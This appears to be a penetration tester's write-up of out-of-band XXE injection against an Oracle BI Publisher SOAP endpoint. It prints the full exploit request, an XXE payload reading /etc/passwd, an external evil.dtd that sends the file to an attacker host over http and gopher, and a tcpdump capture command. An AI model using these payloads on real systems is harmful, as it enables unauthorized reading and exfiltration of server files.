Out of Band XXE Injection Via gopher
Hello All
While I was doing a penetration test , I found a page that uses oracle product .
After searching I have found this exploit which seemed to be valid :
https://www.exploit-db.com/exploits/40590
So Let’s try this exploit
POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXML
Host: vulnerablehost
Content-Length: 630<soapenv:Envelope xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=”http://www.w3.org/2001/XMLSchema" xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser=”http://xmlns.oracle.com/oxp/service/service_gateway">
<soapenv:Header/>
<soapenv:Body>
<ser:replyToXML soapenv:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/">
<incomingXML xsi:type=”xsd:string”><![CDATA[<?xml version=”1.0" encoding=”utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM “http://attacker/file.xml">%remote;]>]]></incomingXML>
</ser:replyToXML>
</soapenv:Body>
</soapenv:Envelope>
Identification Phase
First to identify this exploit let’s try burpcollaborator :
xxe.ik6popcppq2yb37iatqr5tcxzo5et3.burpcollaborator.net
So now , we become sure that there is out of band xml injection , as the server makes dns and http query on burpcollaborator
Exploitation
Let’s try to exfiltrate data using out of band xxe , we could use this payload :
<?xml version=”1.0" encoding=”utf-8"?><!DOCTYPE m [
<!ENTITY % file SYSTEM “file:///etc/passwd”>
<!ENTITY % dtd SYSTEM “http://myhost/evil.dtd">
%dtd;
]]>
and the evil.dtd is hosted on my server ,and this its content :
<!ENTITY % all “<!ENTITY send SYSTEM ‘http://myhost:80/%file;'>"> %all;
here we could exfiltrate the first line of /etc/passwd
Full Exploitation
now our goal is to get the whole /etc/passwd file , I searched for this issue , and one of the methods is to use ftp server and try to connect with ftp://myhost:port , but this method failed as the server reject this uri schema .
At last I manged to do this using gopher uri schema , so the evil.dtd will be as that:
<!ENTITY % all “<!ENTITY send SYSTEM ‘gopher://myhost:80/%file;’>”> %all;
and I did a tcpdump on port 80 using this command :
tcpdump -A src host vulnerablehost and port 80 and greater 1000
As seen we could extract any file using gopher URI schema with out of band xxe injection .